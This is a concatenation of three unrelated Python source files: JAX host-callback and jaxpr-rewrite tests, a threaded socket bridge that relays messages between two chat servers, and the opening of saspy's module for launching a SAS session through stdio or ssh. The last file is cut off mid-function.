return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = api.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() != "cpu":
assert api.devices("cpu")
self.outside_device = api.devices("cpu")[0]
else:
if len(api.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = api.devices("cpu")[1]
super().setUp()
def test_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), api.jit(f_outside)(3.))
def test_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {api.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = api.grad(f_jax)(3.)
self.assertAllClose(res_jax, api.grad(f_outside)(3.))
def test_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = api.grad(f_jax)(x)
self.assertAllClose(res_jax, api.grad(f_outside)(x))
def test_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = api.grad(api.grad(f_jax))(5.)
res_outside = api.grad(api.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = api.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] b d
g = id e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c e
h = id f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] 42 b
e = id c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print what='x') ] a c
f = id d
b = add a 1
_ g = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print what='x + 1') ] b e
h = id f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] d f
i = id g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c f
i = id g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a g
j = id h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c f
i = id g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a g
j = id h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i = id_tap[ arg_treedef_=PyTreeDef(tuple, [*,*])
has_token_=True
tap_func_=_print ] b c g
j = id h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print
transforms=(('transpose',),) ] e g
j = id h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] b g
j = id h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, api.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c g
j = id h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
api.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a e f.
let b g = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print
tap_with_device_=True ] a e
h = id f
c = convert_element_type[ new_dtype=float32 ] b
d = sin c
in (d, g, h) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2])])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
main.py
|
import argparse, sys, socket # Import all
from threading import Thread
import json
# We use threading, cuz multiprocessing is bad at passing arguments to targets
# also, we don`t need GIL unlocking.
VERSION = "v0.2"
class Client:
def __init__(self):
self.parser()
self.start()
def build_msg(self, msg): # Build msg
message = {"user": "[BRIDGE]", "msg": msg}
return json.dumps(message, ensure_ascii=False).encode()
def parser(self):
parser = argparse.ArgumentParser(
prog="anonchat-bridge",
description = "Bridge messages between two anonchats",
epilog="---- Oh, hello there!") # Create parser
parser.add_argument("ip", help = "IP of first anonchat-server", type=str)
parser.add_argument("ip2", help = "IP of second anonchat-server", type=str) # Assign all args
args = parser.parse_args() # Parse args
ip = args.ip.split(":") # Split First IP
ip.append(6969) # If port is not passed, add it to select later
ip2 = args.ip2.split(":") # Second IP
ip2.append(6969)
if ip == ip2:
print(f"Cannot bridge two same servers!")
sys.exit()
self.ip = ip[0] # Select First IP adress
try:
self.port = int(ip[1]) # Try to parse port
except:
print(f"Cannot parse port {ip[1]} as number. Aborting.")
sys.exit()
self.ip2 = ip2[0] # Second IP
try:
self.port2 = int(ip2[1]) # Second port
except:
print(f"Cannot parse port {ip2[1]} as number. Aborting.")
sys.exit()
def start(self):
print(f"[BRIDGE] [GEN] [INF] Bridge version - {VERSION}")
print(f"[BRIDGE] [GEN] [INF] Connecting Socket to IP0 - {self.ip}:{self.port}")
self.socket_ip1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create and bind first socket to First IP
self.socket_ip1.connect((self.ip, self.port))
print(f"[BRIDGE] [GEN] [INF] Socket bound to IP0")
print(f"[BRIDGE] [GEN] [INF] Connecting Socket to IP1 - {self.ip2}:{self.port2}")
self.socket_ip2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Second IP
self.socket_ip2.connect((self.ip2, self.port2))
print(f"[BRIDGE] [GEN] [INF] Socket bound to IP1")
self.socket_ip1.send(self.build_msg(f"Bridge from {self.ip2}:{self.port2} bounded to this server!"))
self.socket_ip2.send(self.build_msg(f"Bridge from {self.ip}:{self.port} bounded to this server!"))
message_blacklist = [self.build_msg(f"Bridge from {self.ip}:{self.port} bounded to this server!"),
self.build_msg(f"Bridge from {self.ip2}:{self.port2} bounded to this server!")]
print(f"[BRIDGE] [GEN] [INF] Start up all processes...")
self.prc_pipe = {"1": None, "2": None, "blacklist": message_blacklist, "kill": False} # Target last messages, or it will create a bunch of spam
self.request_1 = Thread(target=self.bridge_to, args=(self.socket_ip1, self.socket_ip2, self.prc_pipe, "1"), daemon=True) # Create Thread to send messages from First IP to Second
self.request_1.start()
self.request_2 = Thread(target=self.bridge_to, args=(self.socket_ip2, self.socket_ip1, self.prc_pipe, "2"), daemon=True) # From Second To First
self.request_2.start()
while True:
pass
def bridge_to(self, socket1, socket2, info, num): # First Socket (to listen from), Second Socket (to send messages), dict with last messages, num of server
target_num = [x for x in info if x != num and x.isdigit()][0]
while True:
if info["kill"]:
return
try:
message = socket1.recv(1024) # Receive message from
except:
break # Break process if error
if not message: # If no message, break all process
break
print(f"[BRIDGE] [IP{int(num)-1}] [INF] Got message from IP{int(num)-1}!")
if info[num] != message and not message in info["blacklist"]: # If message is was not sended in this server at last
print(f"[BRIDGE] [IP{int(num)-1}] [INF] Sending message to IP{int(target_num)-1}.")
socket2.send(message) # Send encoded message
info.update({"1": message}) # Set up last messages at 1 and at second server
info.update({"2": message})
else:
print(f"[BRIDGE] [IP{int(num)-1}] [INF] Not sending message, because message is already sended or in blacklist.")
if __name__ == "__main__":
cli = Client() # Create object if not imported
|
sasiostdio.py
|
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
if os.name != 'nt':
import fcntl
import signal
import subprocess
import tempfile as tf
from time import sleep
import socket as socks
import codecs
import select as sel
import warnings
import io
import logging
logger = logging.getLogger('saspy')
try:
import pandas as pd
import numpy as np
except ImportError:
pass
if os.name == 'nt':
from queue import Queue, Empty
from threading import Thread
class SASconfigSTDIO:
"""
This object is not intended to be used directly. Instantiate a SASsession object instead
"""
def __init__(self, session, **kwargs):
self._kernel = kwargs.get('kernel', None)
SAScfg = session._sb.sascfg.SAScfg
self.name = session._sb.sascfg.name
cfg = getattr(SAScfg, self.name)
self.saspath = cfg.get('saspath', '')
self.options = cfg.get('options', [])
self.ssh = cfg.get('ssh', '')
self.identity = cfg.get('identity', None)
self.luser = cfg.get('luser', None)
self.tunnel = cfg.get('tunnel', None)
self.rtunnel = cfg.get('rtunnel', None)
self.port = cfg.get('port', None)
self.host = cfg.get('host', '')
self.encoding = cfg.get('encoding', '')
self.metapw = cfg.get('metapw', '')
self.lrecl = cfg.get('lrecl', None)
self.iomc = cfg.get('iomc', '')
self.dasho = cfg.get('dasho', None)
localhost = cfg.get('localhost', None)
try:
self.outopts = getattr(SAScfg, "SAS_output_options")
self.output = self.outopts.get('output', 'html5')
except:
self.output = 'html5'
if self.output.lower() not in ['html', 'html5']:
logger.warning("Invalid value specified for SAS_output_options. Using the default of HTML5")
self.output = 'html5'
# GET Config options
try:
self.cfgopts = getattr(SAScfg, "SAS_config_options")
except:
self.cfgopts = {}
lock = self.cfgopts.get('lock_down', True)
# in lock down mode, don't allow runtime overrides of option values from the config file.
self.verbose = self.cfgopts.get('verbose', True)
self.verbose = kwargs.get('verbose', self.verbose)
insaspath = kwargs.get('saspath', '')
if len(insaspath) > 0:
if lock and len(self.saspath):
logger.warning("Parameter 'saspath' passed to SAS_session was ignored due to configuration restriction.")
else:
self.saspath = insaspath
inoptions = kwargs.get('options', '')
if len(inoptions) > 0:
if lock and len(self.options):
logger.warning("Parameter 'options' passed to SAS_session was ignored due to configuration restriction.")
else:
self.options = inoptions
inssh = kwargs.get('ssh', '')
if len(inssh) > 0:
if lock and len(self.ssh):
logger.warning("Parameter 'ssh' passed to SAS_session was ignored due to configuration restriction.")
else:
self.ssh = inssh
inident = kwargs.get('identity', None)
if inident is not None:
if lock:
logger.warning("Parameter 'identity' passed to SAS_session was ignored due to configuration restriction.")
else:
self.identity = inident
inluser = kwargs.get('luser', None)
if inluser is not None:
if lock:
logger.warning("Parameter 'luser' passed to SAS_session was ignored due to configuration restriction.")
else:
self.luser = inluser
intunnel = kwargs.get('tunnel', None)
if intunnel is not None:
if lock:
logger.warning("Parameter 'tunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.tunnel = intunnel
inrtunnel = kwargs.get('rtunnel', None)
if inrtunnel is not None:
if lock:
logger.warning("Parameter 'rtunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.rtunnel = inrtunnel
ino = kwargs.get('dasho', None)
if ino is not None:
if lock and self.dasho is not None:
logger.warning("Parameter 'dasho' passed to SAS_session was ignored due to configuration restriction.")
else:
self.dasho = ino
inport = kwargs.get('port', None)
if inport is not None:
if lock:
logger.warning("Parameter 'port' passed to SAS_session was ignored due to configuration restriction.")
else:
self.port = inport
inloc = kwargs.get('localhost', None)
if inloc is not None:
if lock and localhost is not None:
logger.warning("Parameter 'localhost' passed to SAS_session was ignored due to configuration restriction.")
else:
localhost = inloc
inhost = kwargs.get('host', '')
if len(inhost) > 0:
if lock and len(self.host):
logger.warning("Parameter 'host' passed to SAS_session was ignored due to configuration restriction.")
else:
self.host = inhost
inencoding = kwargs.get('encoding', 'NoOverride')
if inencoding !='NoOverride':
if lock and len(self.encoding):
logger.warning("Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.")
else:
self.encoding = inencoding
if not self.encoding:
self.encoding = '' # 'utf-8'
if self.encoding != '':
try:
coinfo = codecs.lookup(self.encoding)
except LookupError:
logger.warning("The encoding provided ("+self.encoding+") doesn't exist in this Python session. Setting it to ''.")
logger.warning("The correct encoding will attempt to be determined based upon the SAS session encoding.")
self.encoding = ''
inlrecl = kwargs.get('lrecl', None)
if inlrecl:
if lock and self.lrecl:
logger.warning("Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.")
else:
self.lrecl = inlrecl
if not self.lrecl:
self.lrecl = 1048576
self._prompt = session._sb.sascfg._prompt
if localhost is not None:
self.hostip = localhost
else:
self.hostip = socks.gethostname()
try:
x = subprocess.Popen(('nslookup', self.hostip), stdout=subprocess.PIPE)
z = x.stdout.read()
ip = z.rpartition(b'Address:')[2].strip().decode()
try:
socks.gethostbyaddr(ip)
self.hostip = ip
except:
pass
x.terminate()
except:
pass
return
class SASsessionSTDIO():
"""
The SASsession object is the main object to instantiate and provides access to the rest of the functionality.
cfgname - value in SAS_config_names List of the sascfg_personal.py file
kernel - None - internal use when running the SAS_kernel notebook
saspath - overrides saspath Dict entry of cfgname in sascfg_personal.py file
options - overrides options Dict entry of cfgname in sascfg_personal.py file
encoding - This is the python encoding value that matches the SAS session encoding of the IOM server you are connecting to
autoexec - This is a string of SAS code that will be submitted upon establishing a connection.
ssh - full path of the ssh command; /usr/bin/ssh for instance
host - host name of the remote machine
identity - path to an .ppk identity file to be used with the ssh -i option
port - (Optional: integer) The ssh port of the remote machine (equivalent to invoking ssh with the -p option)
tunnel - (Optional: integer) Certain methods of saspy require opening a local port and accepting data streamed from the SAS instance.
"""
#def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, saspath :str ='', options: list =[]) -> '<SASsession object>':
def __init__(self, **kwargs):
self.pid = None
self.stdin = None
self.stderr = None
self.stdout = None
self._sb = kwargs.get('sb', None)
self._log_cnt = 0
self._log = ""
self.sascfg = SASconfigSTDIO(self, **kwargs)
self._startsas()
return
def __del__(self):
if self.pid:
self._endsas()
self._sb.SASpid = None
def _logcnt(self, next=True):
if next == True:
self._log_cnt += 1
return '%08d' % self._log_cnt
def _buildcommand(self, sascfg):
if sascfg.ssh:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t"]
if sascfg.dasho:
if type(sascfg.dasho) == list:
for s in sascfg.dasho:
parms += ["-o", s]
else:
parms += ["-o", sascfg.dasho]
if sascfg.identity:
parms += ["-i", sascfg.identity]
if sascfg.port:
parms += ["-p", str(sascfg.port)]
if sascfg.tunnel:
parms += ["-R", '%d:localhost:%d' % (sascfg.tunnel,sascfg.tunnel)]
if sascfg.rtunnel:
parms += ["-L", '%d:localhost:%d' % (sascfg.rtunnel,sascfg.rtunnel)]
if sascfg.luser:
parms += [sascfg.luser+'@'+sascfg.host, sascfg.saspath]
else:
parms += [sascfg.host, sascfg.saspath]
if sascfg.output.lower() == 'html':
logger.warning("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg_personal.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the sample sascfg.py.
Will use HTML5 for this SASsession.""")
sascfg.output = 'html5'
else:
pgm = sascfg.saspath
parms = [pgm]
# temporary hack for testing grid w/ sasgsub and iomc ...
if sascfg.iomc:
pgm = sascfg.iomc
parms = [pgm]
parms += ["user", "sas", "pw", "sas"]
parms += ['']
elif sascfg.metapw:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t", "-i", "/u/sastpw/idrsacnn", sascfg.host]
parms += sascfg.options
#parms += ['"'+sascfg.saspath+' -nodms -stdio -terminal -nosyntaxcheck -pagesize MAX"']
parms += ['']
else:
parms += sascfg.options
parms += ["-nodms"]
parms += ["-stdio"]
parms += ["-terminal"]
parms += ["-nosyntaxcheck"]
parms += ["-pagesize", "MAX"]
parms += ['']
return [pgm, parms]
def _startsas(self):
if self.pid:
return self.pid
pgm, parms = self._buildcommand(self.sascfg)
s = ''
for i in range(len(parms)):
s += parms[i]+' '
if os.name == 'nt':
try:
self.pid = subprocess.Popen(parms, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid = self.pid.pid
except OSError as e:
msg = "The OS Error was:\n"+e.strerror+'\n'
msg += "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n"
logger.error(msg)
return None
else:
PIPE_READ = 0
PIPE_WRITE = 1
pin = os.pipe()
pout = os.pipe()
perr = os.pipe()
try:
pidpty = os.forkpty()
except:
import pty
pidpty = pty.fork()
if pidpty[0]:
# we are the parent
pid = pidpty[0]
os.close(pin[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_WRITE])
else:
# we are the child
signal.signal(signal.SIGINT, signal.SIG_DFL)
os.close(0)
os.close(1)
os.close(2)
os.dup2(pin[PIPE_READ], 0)
os.dup2(pout[PIPE_WRITE], 1)
os.dup2(perr[PIPE_WRITE], 2)
os.close(pin[PIPE_READ])
os.close(pin[PIPE_WRITE])
os.close(pout[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_READ])
os.close(perr[PIPE_WRITE])
try:
#sleep(5)
os.execv(pgm, parms)
except OSError as e:
msg = "The OS Error was:\n"+e.strerror+'\n'
msg += "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n"
logger.error(msg)
os._exit(-6)
except:
logger.error("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
os._exit(-6)
if os.name == 'nt':
try:
self.pid.wait(1)
error = self.pid.stderr.read(4096).decode()+'\n'
error += self.pid.stdout.read(4096).decode()
logger.error("Java Error:\n"+error)
msg = "Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n"
logger.error(msg)
self.pid = None
return None
except:
# lame windows can't do non-blocking I/O
self.stdout = Queue()
self.stderr = Queue()
self.to = Thread(target=self._read_out, args=())
self.te = Thread(target=self._read_err, args=())
self.to.daemon = True
self.te.daemon = True
self.to.start()
self.te.start()
self.stdin = self.pid.stdin
else:
self.pid = pidpty[0]
self.stdin = os.fdopen(pin[PIPE_WRITE], mode='wb')
self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
lst = self.stdout.read1(4096)
logger.error("stdout from subprocess is:\n"+lst.decode())
if self.pid is None:
msg = "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n"
logger.error(msg)
return None
else:
enc = self.sascfg.encoding #validating encoding is done next, so handle it not being set for this one call
if enc == '':
self.sascfg.encoding = 'utf-8'
ll = self.submit("options svgtitle='svgtitle'; options validvarname=any validmemname=extend; ods graphics on;", "text")
self.sascfg.encoding = enc
if self.pid is None:
